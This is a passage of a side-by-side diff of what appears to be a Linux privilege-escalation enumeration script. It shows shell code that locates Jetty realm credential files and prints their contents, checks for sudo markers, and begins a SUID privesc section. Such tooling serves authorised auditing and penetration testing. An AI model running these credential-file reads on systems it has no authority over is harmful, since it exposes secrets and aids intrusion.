if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then echo_not_found "jetty-realm.properties"; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
print_2title "Analyzing Interesting logs Files (limit 70)" print_2title "Analyzing Interesting logs Files (limit 70)"
@ -3196,17 +3162,16 @@ if echo $CHECKS | grep -q SofI; then
if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo "";
echo ""
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
fi fi
echo''
echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
if echo $CHECKS | grep -q interesting_files;
if echo $CHECKS | grep -q IntFiles; then print_title "Interesting Files"
########################################### ###########################################
#----------) Interesting files (----------# #----------) Interesting files (----------#
########################################### ###########################################
print_title "Interesting Files"
##-- IF) SUID ##-- IF) SUID
print_2title "SUID - Check easy privesc, exploits and write perms" print_2title "SUID - Check easy privesc, exploits and write perms"
@ -3844,3 +3809,6 @@ if echo $CHECKS | grep -q IntFiles; then
echo "" echo ""
fi fi
fi fi
echo''
echo''
if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi